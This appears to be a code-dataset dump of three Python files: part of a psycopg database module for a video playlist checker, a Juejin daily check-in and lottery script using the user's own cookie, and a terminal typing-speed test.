cached_tags.get(default_tag.lower())\n if not tag_id:\n logger.warning('Tag %s not found' % default_tag)\n continue\n\n values.append((tag_id, video_id))\n\n sql = 'INSERT INTO videoTags (tag_id, video_id) VALUES %s ON CONFLICT DO NOTHING '\n\n with self.conn.cursor() as cursor:\n execute_values(cursor, sql, values, page_size=2000)\n\n @transaction(real_transaction=True)\n def add_channels(self, channels: Iterable[BaseChannel], channel_cache: set[str], site: int | Site, cur: Cursor = NotImplemented):\n \"\"\"\n Adds channels to db and updates old entries\n Columns updated are as follows:\n name and thumbnail aka profile pic\n\n Args:\n channels: iterable of channels to add\n channel_cache: Set of all channels ids in db\n site: id of the site\n cur: Optional cursor\n\n \"\"\"\n site = int(site)\n channels = set(channels)\n do_insert = channels - cast(set[BaseChannel], channel_cache)\n do_update = channels - do_insert\n\n if not (do_insert or do_update):\n return\n\n if do_insert:\n sql = 'INSERT INTO channels (channel_id, name, thumbnail, site) VALUES %s'\n\n execute_values(cur, sql, [(c.channel_id, c.name, c.thumbnail, site) for c in do_insert], page_size=1000)\n\n channel_cache.update([c.channel_id for c in do_insert])\n\n if do_update:\n sql = 'UPDATE channels AS c SET ' \\\n 'name=COALESCE(v.name, c.name), ' \\\n 'thumbnail=COALESCE(v.thumbnail, c.thumbnail) ' \\\n 'FROM (VALUES %s) AS v(channel_id, name, thumbnail) ' \\\n 'WHERE v.channel_id=c.channel_id'\n\n execute_values(cur, sql, [(c.channel_id, c.name, c.thumbnail) for c in do_update], page_size=1000)\n\n @transaction(no_cursor=True)\n def add_channel_videos(self,\n videos: Iterable[BaseVideo],\n channels: Sequence[BaseChannel | str],\n channel_cache: set[str],\n db_videos: dict[str, int],\n site: int | Site):\n \"\"\"\n Link video ids to channel ids in the channelVideos table\n This will handle adding missing channels for you. The videos need\n to have the channel property set to for this to work\n\n Args:\n videos: List of :class:BaseVideo instances\n channels: List of BaseChannel instances and channel_ids as str\n channel_cache: List of cached channel ids\n db_videos: video_id to db id\n site: id of the site being used\n \"\"\"\n self.add_channels([c for c in channels if not isinstance(c, str)], channel_cache, site)\n sql = 'SELECT id, channel_id FROM channels WHERE channel_id=ANY(%s)'\n\n channel_ids = {}\n with self.class_cursor(models.Channel) as cursor:\n cursor.execute(sql, [[c if isinstance(c, str) else c.channel_id for c in channels]])\n\n for row in cursor:\n channel_ids[row.channel_id] = row.id\n\n data = []\n\n for vid in videos:\n channel_id = channel_ids.get(vid.channel_id)\n if not channel_id:\n logger.warning(f'Channel not found for video {vid}')\n continue\n\n vid_id = db_videos.get(vid.video_id)\n if not vid_id:\n continue\n\n data.append((channel_id, vid_id))\n\n sql = 'INSERT INTO channelVideos (channel_id, video_id) VALUES %s ON CONFLICT DO NOTHING'\n with self.conn.cursor() as cursor:\n execute_values(cursor, sql, data, page_size=2000)\n\n @transaction()\n def add_playlist_vids(self, playlist_id: int, video_ids: Iterable[int], cur: Cursor = NotImplemented):\n \"\"\"\n Add video playlist connection to the playlistVideos table\n\n Args:\n playlist_id:\n The database id for the playlist\n video_ids:\n An iterable of database ids for videos that are added the\n specified playlist\n cur: optional cursor\n \"\"\"\n sql = 'INSERT INTO playlistVideos (playlist_id, video_id) VALUES ' \\\n '%s ON CONFLICT DO NOTHING'\n\n values = tuple((playlist_id, video_id) for video_id in video_ids)\n\n execute_values(cur, sql, values, page_size=2000)\n\n @transaction()\n def update_removed_playlist_videos(self, playlist_id: int, video_ids: list[int], cur: Cursor = NotImplemented):\n \"\"\"\n Removes playlist videos that are not found in the video_ids iterable.\n \"\"\"\n sql = 'DELETE FROM playlistvideos WHERE playlist_id=%s AND NOT video_id=ANY(%s)'\n cur.execute(sql, [playlist_id, video_ids])\n logger.info(f'User removed {cur.rowcount} videos from playlist {playlist_id}')\n\n @transaction(row_factory=class_row(models.PartialVideo))\n def get_vid_ids(self, vid_ids: list[str], site: int | Site, cur: Cursor[models.PartialVideo] = NotImplemented) -> dict[str, int]:\n \"\"\"\n Gets the database ids to the corresponding video ids\n\n Args:\n vid_ids:\n list of video ids of the specified site.\n site:\n ID of the site being used\n\n Returns:\n dict: a dictionary of type {str: int} aka {video_id: database_id}\n \"\"\"\n site = int(site)\n sql = f'SELECT id, video_id, site FROM videos WHERE site={site} AND video_id=ANY(%s)'\n\n cur.execute(sql, [vid_ids])\n vid_ids = {vid.video_id: vid.id for vid in cur}\n\n return vid_ids\n\n @transaction(row_factory=class_row(models.PlaylistVideo))\n def get_playlist_video_ids(self, playlist_id: int, cur: Cursor[models.PlaylistVideo] = NotImplemented) -> list[models.PlaylistVideo]:\n \"\"\"\n Gets all video ids that are associated with this playlist\n Args:\n playlist_id: id of the playlist\n cur: Optional cursor\n Returns:\n list:\n A list PlaylistVideo objects with the video_id property set\n \"\"\"\n sql = 'SELECT video_id FROM playlistVideos WHERE playlist_id=%s'\n cur.execute(sql, (playlist_id,))\n return cur.fetchall()\n\n @transaction(row_factory=class_row(models.VideoExtraFiles))\n def get_extra_files(self, video_id: int, cur: Cursor[models.VideoExtraFiles] = NotImplemented) -> Optional[models.VideoExtraFiles]:\n sql = 'SELECT * FROM extra_video_files WHERE video_id=%s'\n cur.execute(sql, (video_id,))\n return cur.fetchone()\n\n @transaction(row_factory=class_row(models.PartialVideo))\n def get_thumbnails_to_dl(self, site: int | Site, cur: Cursor[models.PartialVideo] = NotImplemented) -> list[models.PartialVideo]:\n \"\"\"\n Finds videos without thumbnail set in extra files\n \"\"\"\n sql = '''\n SELECT v.video_id, v.id FROM videos v\n LEFT JOIN extra_video_files evf ON v.id = evf.video_id\n WHERE v.site=%s AND v.deleted=FALSE AND evf.thumbnail IS NULL AND \n (v.download=FALSE OR (v.force_redownload=FALSE AND v.downloaded_format IS NOT NULL))\n '''\n cur.execute(sql, (int(site),))\n return cur.fetchall()\n\n def iter_videos_to_download(self, playlist_ids: list[int] = None) -> Generator[models.Video, None, None]:\n where = '((download=TRUE or force_redownload=TRUE) AND deleted=FALSE)'\n join = ''\n args = ()\n\n if playlist_ids:\n where = 'pv.playlist_id=ANY(%s) AND ' + where\n join = 'INNER JOIN playlistvideos pv ON v.id = pv.video_id'\n args = [playlist_ids]\n\n sql = f'''\n SELECT DISTINCT ON (id) id, site, v.video_id, downloaded_format, downloaded_filename, download_format, force_redownload, container_override\n FROM videos v\n {join}\n WHERE {where}\n '''\n\n with self.class_cursor(models.Video) as cursor:\n cursor.execute(sql, args)\n for row in cursor:\n yield row\n\n @transaction()\n def update_vid_filename(self, filename: Optional[str], downloaded_format: Optional[str], video_id: int, cur: Cursor = NotImplemented):\n sql = '''\n UPDATE videos SET \n downloaded_filename=COALESCE(%s, downloaded_filename), \n downloaded_format=COALESCE(%s, downloaded_format), \n force_redownload=FALSE\n WHERE id=%s\n '''\n cur.execute(sql, (filename, downloaded_format, video_id))\n\n @transaction()\n def update_filename(self, filename: str, video_id: int, cur: Cursor = NotImplemented):\n cur.execute('UPDATE videos SET downloaded_filename=%s WHERE id=%s', (filename, video_id))\n\n @transaction()\n def update_extra_files(self, model: models.VideoExtraFiles, cur: Cursor = NotImplemented):\n sql = '''\n INSERT INTO extra_video_files as e (video_id, thumbnail, info_json, other_files, audio_file, subtitles) \n VALUES (%s, %s, %s, %s, %s, %s)\n ON CONFLICT (video_id) DO UPDATE \n SET thumbnail=COALESCE(EXCLUDED.thumbnail, e.thumbnail), \n info_json=COALESCE(EXCLUDED.info_json, e.info_json), \n other_files=COALESCE(EXCLUDED.other_files, e.other_files),\n audio_file=COALESCE(EXCLUDED.audio_file, e.audio_file),\n subtitles=COALESCE(EXCLUDED.subtitles, e.subtitles)\n '''\n other_files = Json(model.other_files) if model.other_files else None\n cur.execute(sql, (model.video_id, model.thumbnail, model.info_json, other_files, model.audio_file, model.subtitles or None))\n\n @transaction()\n def videos_for_script(self, videos: set[BaseVideo], site: int | Site, cur: Cursor = NotImplemented) -> list[models.VideoToScript]:\n \"\"\"\n Transforms the given set of videos into a list that can be passed to a script\n \"\"\"\n site = int(site)\n sql = f'''\n SELECT v.video_id, v.title, c.name, c.channel_id, v.downloaded_filename, v.deleted_at, v.published_at\n FROM videos v \n LEFT JOIN channelVideos cv ON cv.video_id=v.id \n LEFT JOIN channels c ON cv.channel_id = c.id\n WHERE v.site=%s AND v.video_id=ANY(%s)\n '''\n\n cur.execute(sql, [site, [vid.video_id for vid in videos]])\n retval = []\n\n for row in cur:\n video_id = row['video_id']\n video = None\n for vid in videos:\n if vid.video_id == video_id:\n video = vid\n break\n\n if not video:\n logger.warning('Video not found from database when it should be added')\n continue\n\n retval.append(models.VideoToScript.from_row(row))\n\n return retval\n\n @transaction()\n def get_deleted_info(self, deleted: set[BaseVideo], site: int | Site, cur: Cursor = NotImplemented) -> list[models.VideoToScript]:\n \"\"\"\n Updates BaseVideo objects with cached info from database\n Namely updates title, channel name and channel id\n\n Args:\n deleted:\n List of the videos to be updated\n site:\n Id of the site used\n cur: optional cursor\n\n Returns:\n list of videos that can be passed to a script\n\n \"\"\"\n if not deleted:\n return []\n\n deleted = deleted.copy()\n\n site = int(site)\n sql = f'''\n SELECT v.video_id, v.title, c.name, c.channel_id, v.downloaded_filename, v.deleted_at, v.published_at\n FROM videos v \n LEFT JOIN channelVideos cv ON cv.video_id=v.id \n LEFT JOIN channels c ON cv.channel_id = c.id\n WHERE v.site=%s AND v.video_id=ANY(%s)\n '''\n\n cur.execute(sql, [site, [vid.video_id for vid in deleted]])\n retval = []\n\n for row in cur:\n video_id = row['video_id']\n video = None\n for vid in deleted:\n if vid.video_id == video_id:\n video = vid\n break\n\n if not video:\n continue\n\n deleted.remove(video)\n retval.append(models.VideoToScript.from_row(row))\n\n for vid in deleted:\n retval.append(models.VideoToScript(\n id=vid.video_id,\n title=vid.title or 'Deleted video',\n channel_id=vid.channel_id,\n channel_name=vid.channel_name,\n filename=None,\n deleted_at=datetime.now(timezone.utc),\n published_at=None\n ))\n\n return retval\n\n @transaction(row_factory=class_row(models.Video))\n def get_new_deleted(self, deleted: set[BaseVideoT], site: int | Site,\n cur: Cursor[models.Video] = NotImplemented) -> set[BaseVideoT]:\n \"\"\"\n Gets the newly deleted videos from the specified site with\n updated titles\n\n Args:\n deleted:\n List of all deleted vids from a site.\n site:\n id if the site currently in use\n cur: optional cursor\n\n Returns:\n set: A set of BaseVideo objects with updated titles\n \"\"\"\n if not deleted:\n return set()\n\n site = int(site)\n sql = f'SELECT id, title, video_id FROM videos WHERE deleted IS FALSE AND site=%s' \\\n ' AND video_id=ANY(%s)'\n\n new_deleted = set()\n cur.execute(sql, [site, [vid.video_id for vid in deleted]])\n\n for video_partial in cur:\n video_id = video_partial.video_id\n video = None\n for vid in deleted:\n if vid.video_id == video_id:\n video = vid\n break\n\n if not video:\n continue\n\n video.title = video_partial.title\n new_deleted.add(video)\n\n return new_deleted\n", "repo_name": "s0hv/playlist-checker", "sub_path": "src/db/dbutils.py", "file_name": "dbutils.py", "file_ext": "py", "file_size_in_byte": 24201, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 17, "usage_type": "call"}, {"api_name": "typing.TypeVar", "line_number": 19, "usage_type": "call"}, {"api_name": "psycopg.Cursor", "line_number": 19, "usage_type": "name"}, {"api_name": "typing.TypeVar", "line_number": 20, "usage_type": "call"}, {"api_name": "psycopg.Connection", "line_number": 20, "usage_type": "name"}, {"api_name": "typing.TypeVar", "line_number": 21, "usage_type": "call"}, {"api_name": "src.video.BaseVideo", "line_number": 21, "usage_type": "name"}, {"api_name": "typing.ParamSpec", "line_number": 24, "usage_type": "call"}, {"api_name": "typing.TypeVar", "line_number": 25, "usage_type": "call"}, {"api_name": "psycopg.rows.BaseRowFactory", "line_number": 28, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 29, "usage_type": "name"}, {"api_name": "typing.Concatenate", "line_number": 29, "usage_type": "name"}, {"api_name": "typing.Type", "line_number": 65, "usage_type": "name"}, {"api_name": "psycopg.rows.class_row", "line_number": 66, "usage_type": "call"}, {"api_name": "contextlib.contextmanager", "line_number": 64, "usage_type": "name"}, {"api_name": "psycopg.Cursor", "line_number": 65, "usage_type": "name"}, {"api_name": "src.enum.Site", "line_number": 72, "usage_type": "name"}, {"api_name": "psycopg.Cursor", "line_number": 73, "usage_type": "name"}, {"api_name": "src.db.models.Playlist", "line_number": 73, "usage_type": "attribute"}, {"api_name": "src.db.models", "line_number": 73, "usage_type": "name"}, {"api_name": "psycopg.rows.class_row", "line_number": 71, "usage_type": "call"}, {"api_name": "src.db.models.Playlist", "line_number": 71, "usage_type": "attribute"}, {"api_name": "src.db.models", "line_number": 71, "usage_type": "name"}, {"api_name": "psycopg.Cursor", "line_number": 97, "usage_type": "name"}, {"api_name": "typing.Iterable", "line_number": 111, "usage_type": "name"}, {"api_name": "src.video.BaseVideo", "line_number": 111, "usage_type": "name"}, {"api_name": "src.enum.Site", "line_number": 111, "usage_type": "name"}, {"api_name": "psycopg.Cursor", "line_number": 111, "usage_type": "name"}, {"api_name": "src.db.utils.execute_values", "line_number": 151, "usage_type": "call"}, {"api_name": "src.db.utils.execute_values", "line_number": 169, "usage_type": "call"}, {"api_name": "typing.Iterable", "line_number": 172, "usage_type": "name"}, {"api_name": "src.video.BaseVideo", "line_number": 172, "usage_type": "name"}, {"api_name": "src.enum.Site", "line_number": 172, "usage_type": "name"}, {"api_name": "psycopg.Cursor", "line_number": 172, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 194, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 194, "usage_type": "name"}, {"api_name": "datetime.timezone.utc", "line_number": 194, "usage_type": "attribute"}, {"api_name": "datetime.timezone", "line_number": 194, "usage_type": "name"}, {"api_name": "src.db.utils.execute_values", "line_number": 199, "usage_type": "call"}, {"api_name": "src.video.BaseVideo", "line_number": 211, "usage_type": "name"}, {"api_name": "src.db.models.Tag", "line_number": 253, "usage_type": "attribute"}, {"api_name": "src.db.models", "line_number": 253, "usage_type": "name"}, {"api_name": "src.db.models.Tag", "line_number": 254, "usage_type": "attribute"}, {"api_name": "src.db.models", "line_number": 254, "usage_type": "name"}, {"api_name": "src.db.utils.execute_values", "line_number": 254, "usage_type": "call"}, {"api_name": "src.db.utils.execute_values", "line_number": 289, "usage_type": "call"}, {"api_name": "typing.Iterable", "line_number": 292, "usage_type": "name"}, {"api_name": "src.channel.BaseChannel", "line_number": 292, "usage_type": "name"}, {"api_name": "src.enum.Site", "line_number": 292, "usage_type": "name"}, {"api_name": "psycopg.Cursor", "line_number": 292, "usage_type": "name"}, {"api_name": "typing.cast", "line_number": 307, "usage_type": "call"}, {"api_name": "src.channel.BaseChannel", "line_number": 307, "usage_type": "name"}, {"api_name": "src.db.utils.execute_values", "line_number": 316, "usage_type": "call"}, {"api_name": "src.db.utils.execute_values", "line_number": 327, "usage_type": "call"}, {"api_name": "typing.Iterable", "line_number": 331, "usage_type": "name"}, {"api_name": "src.video.BaseVideo", "line_number": 331, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 332, "usage_type": "name"}, {"api_name": "src.channel.BaseChannel", "line_number": 332, "usage_type": "name"}, {"api_name": "src.enum.Site", "line_number": 335, "usage_type": "name"}, {"api_name": "src.db.models.Channel", "line_number": 352, "usage_type": "attribute"}, {"api_name": "src.db.models", "line_number": 352, "usage_type": "name"}, {"api_name": "src.db.utils.execute_values", "line_number": 374, "usage_type": "call"}, {"api_name": "typing.Iterable", "line_number": 377, "usage_type": "name"}, {"api_name": "psycopg.Cursor", "line_number": 377, "usage_type": "name"}, {"api_name": "src.db.utils.execute_values", "line_number": 394, "usage_type": "call"}, {"api_name": "psycopg.Cursor", "line_number": 397, "usage_type": "name"}, {"api_name": "src.enum.Site", "line_number": 406, "usage_type": "name"}, {"api_name": "psycopg.Cursor", "line_number": 406, "usage_type": "name"}, {"api_name": "src.db.models.PartialVideo", "line_number": 406, "usage_type": "attribute"}, {"api_name": "src.db.models", "line_number": 406, "usage_type": "name"}, {"api_name": "psycopg.rows.class_row", "line_number": 405, "usage_type": "call"}, {"api_name": "src.db.models.PartialVideo", "line_number": 405, "usage_type": "attribute"}, {"api_name": "src.db.models", "line_number": 405, "usage_type": "name"}, {"api_name": "psycopg.Cursor", "line_number": 428, "usage_type": "name"}, {"api_name": "src.db.models.PlaylistVideo", "line_number": 428, "usage_type": "attribute"}, {"api_name": "src.db.models", "line_number": 428, "usage_type": "name"}, {"api_name": "psycopg.rows.class_row", "line_number": 427, "usage_type": "call"}, {"api_name": "src.db.models.PlaylistVideo", "line_number": 427, "usage_type": "attribute"}, {"api_name": "src.db.models", "line_number": 427, "usage_type": "name"}, {"api_name": "psycopg.Cursor", "line_number": 443, "usage_type": "name"}, {"api_name": "src.db.models.VideoExtraFiles", "line_number": 443, "usage_type": "attribute"}, {"api_name": "src.db.models", "line_number": 443, "usage_type": "name"}, {"api_name": "psycopg.rows.class_row", "line_number": 442, "usage_type": "call"}, {"api_name": "src.db.models.VideoExtraFiles", "line_number": 442, "usage_type": "attribute"}, {"api_name": "src.db.models", "line_number": 442, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 443, "usage_type": "name"}, {"api_name": "src.enum.Site", "line_number": 449, "usage_type": "name"}, {"api_name": "psycopg.Cursor", "line_number": 449, "usage_type": "name"}, {"api_name": "src.db.models.PartialVideo", "line_number": 449, "usage_type": "attribute"}, {"api_name": "src.db.models", "line_number": 449, "usage_type": "name"}, {"api_name": "psycopg.rows.class_row", "line_number": 448, "usage_type": "call"}, {"api_name": "src.db.models.PartialVideo", "line_number": 448, "usage_type": "attribute"}, {"api_name": "src.db.models", "line_number": 448, "usage_type": "name"}, {"api_name": "src.db.models.Video", "line_number": 479, "usage_type": "attribute"}, {"api_name": "src.db.models", "line_number": 479, "usage_type": "name"}, {"api_name": "typing.Generator", "line_number": 462, "usage_type": "name"}, {"api_name": "src.db.models.Video", "line_number": 462, "usage_type": "attribute"}, {"api_name": "src.db.models", "line_number": 462, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 485, "usage_type": "name"}, {"api_name": "psycopg.Cursor", "line_number": 485, "usage_type": "name"}, {"api_name": "psycopg.Cursor", "line_number": 496, "usage_type": "name"}, {"api_name": "src.db.models.VideoExtraFiles", "line_number": 500, "usage_type": "attribute"}, {"api_name": "src.db.models", "line_number": 500, "usage_type": "name"}, {"api_name": "psycopg.Cursor", "line_number": 500, "usage_type": "name"}, {"api_name": "psycopg.types.json.Json", "line_number": 511, "usage_type": "call"}, {"api_name": "src.video.BaseVideo", "line_number": 515, "usage_type": "name"}, {"api_name": "src.enum.Site", "line_number": 515, "usage_type": "name"}, {"api_name": "psycopg.Cursor", "line_number": 515, "usage_type": "name"}, {"api_name": "src.db.models.VideoToScript.from_row", "line_number": 543, "usage_type": "call"}, {"api_name": "src.db.models.VideoToScript", "line_number": 543, "usage_type": "attribute"}, {"api_name": "src.db.models", "line_number": 543, "usage_type": "name"}, {"api_name": "src.db.models.VideoToScript", "line_number": 515, "usage_type": "attribute"}, {"api_name": "src.db.models", "line_number": 515, "usage_type": "name"}, {"api_name": "src.video.BaseVideo", "line_number": 548, "usage_type": "name"}, {"api_name": "src.enum.Site", "line_number": 548, "usage_type": "name"}, {"api_name": "psycopg.Cursor", "line_number": 548, "usage_type": "name"}, {"api_name": "src.db.models.VideoToScript.from_row", "line_number": 593, "usage_type": "call"}, {"api_name": "src.db.models.VideoToScript", "line_number": 593, "usage_type": "attribute"}, {"api_name": "src.db.models", "line_number": 593, "usage_type": "name"}, {"api_name": "src.db.models.VideoToScript", "line_number": 596, "usage_type": "call"}, {"api_name": "src.db.models", "line_number": 596, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 602, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 602, "usage_type": "name"}, {"api_name": "datetime.timezone.utc", "line_number": 602, "usage_type": "attribute"}, {"api_name": "datetime.timezone", "line_number": 602, "usage_type": "name"}, {"api_name": "src.db.models.VideoToScript", "line_number": 548, "usage_type": "attribute"}, {"api_name": "src.db.models", "line_number": 548, "usage_type": "name"}, {"api_name": "src.enum.Site", "line_number": 609, "usage_type": "name"}, {"api_name": "psycopg.Cursor", "line_number": 610, "usage_type": "name"}, {"api_name": "src.db.models.Video", "line_number": 610, "usage_type": "attribute"}, {"api_name": "src.db.models", "line_number": 610, "usage_type": "name"}, {"api_name": "psycopg.rows.class_row", "line_number": 608, "usage_type": "call"}, {"api_name": "src.db.models.Video", "line_number": 608, "usage_type": "attribute"}, {"api_name": "src.db.models", "line_number": 608, "usage_type": "name"}]} +{"seq_id": "10543380884", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2021-12-10 17:12\n# @Author : jiale\n# @Site : 掘金签到获取矿石并抽奖\n# @File : juejin.py\n# @Software: PyCharm\nimport json\n\nimport requests\n\nfrom common import constants\nfrom common.title_type import TitleType\n\n\nclass JueJinCheckin:\n\n def __init__(self):\n self.header = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36\",\n \"Content-Type\": \"text/json; charset=utf-8\"\n }\n cookies_str = constants.juejin_cookie\n cookies_dict = {}\n for cookie in cookies_str.split('; '):\n cookies_dict[cookie.split('=')[0]] = cookie.split('=')[-1]\n self.cookies = cookies_dict\n\n # 签到\n def checkin(self):\n checkin_url = \"https://api.juejin.cn/growth_api/v1/check_in\"\n response = requests.post(url=checkin_url, cookies=self.cookies)\n resp_data = json.loads(response.text)\n print(\"%s签到响应:%s\" % (TitleType.JueJin.value[0], resp_data))\n if 0 == resp_data[\"err_no\"]:\n if resp_data[\"err_msg\"] == 'success':\n return \"签到成功,增加矿石: %dM\" % (resp_data[\"data\"][\"incr_point\"])\n else:\n return \"签到失败: %s\" % resp_data[\"err_msg\"]\n else:\n return \"签到失败,%s\" % resp_data[\"err_msg\"]\n\n # 获取总矿石\n def get_cur_point(self):\n info_url = \"https://api.juejin.cn/growth_api/v1/get_cur_point\"\n response = requests.get(url=info_url, cookies=self.cookies)\n # 响应:{\"err_no\":0,\"err_msg\":\"success\",\"data\":766}\n resp_data = json.loads(response.text)\n print(\"%s获取总矿石响应:%s\" % (TitleType.JueJin.value[0], resp_data))\n\n # 获取沾福气列表\n def dip_luck_list(self):\n data = {\"page_no\": 1, \"page_size\": 5}\n list_url = \"https://api.juejin.cn/growth_api/v1/lottery_history/global_big\"\n response = requests.post(url=list_url, json=data, cookies=self.cookies)\n resp_data = json.loads(response.text)\n if 0 == resp_data[\"err_no\"]:\n lottery = resp_data[\"data\"][\"lotteries\"][0]\n # 进行沾福气\n return self.dip_luck(lottery[\"history_id\"])\n else:\n return \"获取沾福气列表失败: %s\" % resp_data[\"err_msg\"]\n\n # 沾福气\n def dip_luck(self, history_id):\n info_url = \"https://api.juejin.cn/growth_api/v1/lottery_lucky/dip_lucky\"\n data = {\n \"lottery_history_id\": history_id\n }\n response = requests.post(url=info_url, json=data, cookies=self.cookies)\n # 响应:{\"err_no\":0,\"err_msg\":\"success\",\"data\":{\"dip_action\":1,\"has_dip\":false,\"total_value\":1679,\"dip_value\":10}}\n resp_data = json.loads(response.text)\n print(\"%s沾福气信息响应:%s\" % (TitleType.JueJin.value[0], resp_data))\n if 0 == resp_data[\"err_no\"]:\n if resp_data[\"err_msg\"] == 'success':\n return \"沾福气成功,获得幸运点数: %d\" % (resp_data[\"data\"][\"dip_value\"])\n else:\n return \"沾福气失败: %s\" % resp_data[\"err_msg\"]\n else:\n return \"沾福气失败,%s\" % resp_data[\"err_msg\"]\n\n # 获取抽奖信息\n def get_draw_info(self):\n info_url = \"https://api.juejin.cn/growth_api/v1/lottery_config/get\"\n response = requests.get(url=info_url, cookies=self.cookies)\n # 响应:{\"err_no\":0,\"err_msg\":\"success\",\"data\":true}\n resp_data = json.loads(response.text)\n print(\"%s查询抽奖信息响应:%s\" % (TitleType.JueJin.value[0], resp_data))\n return resp_data\n\n # 抽奖\n def draw(self):\n draw_info = self.get_draw_info()\n if draw_info[\"err_no\"] == 0:\n if draw_info[\"data\"][\"free_count\"] > 0:\n draw_url = \"https://api.juejin.cn/growth_api/v1/lottery/draw\"\n response = requests.post(url=draw_url, cookies=self.cookies)\n # 响应 : {'err_no': 0, 'err_msg': 'success', 'data': {'id': 19, 'lottery_id': '6981716980386496552',\n # 'lottery_name': '11矿石', 'lottery_type': 1, 'lottery_image':\n # 'https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/32ed6a7619934144882d841761b63d3c~tplv-k3u1fbpfcp\n # -no-mark:0:0:0:0.image', 'lottery_desc': '', 'history_id': '7087024855945576482',\n # 'total_lucky_value': 1699, 'draw_lucky_value': 10}}\n resp_data = json.loads(response.text)\n print(\"%s抽奖响应:%s\" % (TitleType.JueJin.value[0], resp_data))\n if resp_data[\"err_no\"] == 0:\n if \"Bug\" != resp_data[\"data\"][\"lottery_name\"]:\n return \"中奖了: %s\" % resp_data[\"data\"][\"lottery_name\"]\n else:\n return \"抽奖失败: %s\" % resp_data[\"err_msg\"]\n else:\n return \"今日已抽奖\"\n else:\n return \"获取抽奖信息失败: %s\" % draw_info[\"err_msg\"]\n\n # 获取用户信息\n def get_user_info(self):\n info_url = \"https://api.juejin.cn/user_api/v1/user/get\"\n response = requests.get(url=info_url, cookies=self.cookies)\n print(response.text)\n", "repo_name": "tangjiale/auto-checkin", "sub_path": "checkin/juejin.py", "file_name": "juejin.py", "file_ext": "py", "file_size_in_byte": 5321, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "common.constants.juejin_cookie", "line_number": 23, "usage_type": "attribute"}, {"api_name": "common.constants", "line_number": 23, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 32, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 33, "usage_type": "call"}, {"api_name": "common.title_type.TitleType.JueJin", "line_number": 34, "usage_type": "attribute"}, {"api_name": "common.title_type.TitleType", "line_number": 34, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 46, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 48, "usage_type": "call"}, {"api_name": "common.title_type.TitleType.JueJin", "line_number": 49, "usage_type": "attribute"}, {"api_name": "common.title_type.TitleType", "line_number": 49, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 55, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 56, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 70, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 72, "usage_type": "call"}, {"api_name": "common.title_type.TitleType.JueJin", "line_number": 73, "usage_type": "attribute"}, {"api_name": "common.title_type.TitleType", "line_number": 73, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 85, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 87, "usage_type": "call"}, {"api_name": "common.title_type.TitleType.JueJin", "line_number": 88, "usage_type": "attribute"}, {"api_name": "common.title_type.TitleType", "line_number": 88, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 97, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 103, "usage_type": "call"}, {"api_name": "common.title_type.TitleType.JueJin", "line_number": 104, "usage_type": "attribute"}, {"api_name": "common.title_type.TitleType", "line_number": 104, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 118, "usage_type": "call"}]} +{"seq_id": "27990850091", "text": "import curses\nfrom curses import wrapper\nimport time\nimport random\n\n\ndef start_screen(stdscr):\n\tstdscr.clear()\n\tstdscr.addstr(\"Welcome to the Speed Typing Test!\")\n\tstdscr.addstr(\"\\nPress any key to begin!\")\n\tstdscr.refresh()\n\tstdscr.getkey()\n\ndef load_text():\n\twith open(\"text.txt\", \"r\") as f:\n\t\tlines = f.readlines()\n\t\treturn random.choice(lines).strip()\n\ndef display(stdscr, target, current, wpm = 0):\n stdscr.addstr(target)\n #stdscr.addstr(1, 0, f\"WPM: {wpm}\")\n \n for i, ch in enumerate(current):\n correct = target[i]\n color = curses.color_pair(1)\n if ch != correct:\n color = curses.color_pair(2)\n stdscr.addstr(0, i, ch, color)\n\ndef test(stdscr):\n target = \"Hello world this is some test text for this app!\"\n current =[]\n wpm = 0\n start = time.time()\n stdscr.nodelay(True)\n while True:\n elapsed = max(time.time() - start, 1)\n wpm = round((len(current)/(elapsed/60)) / 5)\n stdscr.clear()\n display(stdscr, target, current, wpm)\n stdscr.addstr(1, 0, f\"WPM: {wpm}\")\n stdscr.refresh()\n \n if \"\".join(current) == target:\n stdscr.nodelay(False)\n break\n \n try:\n key = stdscr.getkey()\n except:\n continue\n\n if len(key) == 1 and ord(key) == 27:\n break\n\n if key in (\"KEY_BACKSPACE\", '\\b', '\\x7f'):\n if len(current) > 0:\n current.pop()\n elif len(current) < len(target):\n current.append(key)\n\n\ndef main(stdscr):\n curses.init_pair(1, curses.COLOR_GREEN, curses.COLOR_BLACK)\n curses.init_pair(2, curses.COLOR_RED, curses.COLOR_BLACK)\n curses.init_pair(3, curses.COLOR_WHITE, curses.COLOR_BLACK) \n start_screen(stdscr)\n test(stdscr)\n stdscr.addstr(2, 0, \"Completed! Press any key to continue\")\n\nwrapper(main)\n", "repo_name": "gitrospective/TermText", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1872, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "random.choice", "line_number": 17, "usage_type": "call"}, {"api_name": "curses.color_pair", "line_number": 25, "usage_type": "call"}, {"api_name": "curses.color_pair", "line_number": 27, "usage_type": "call"}, 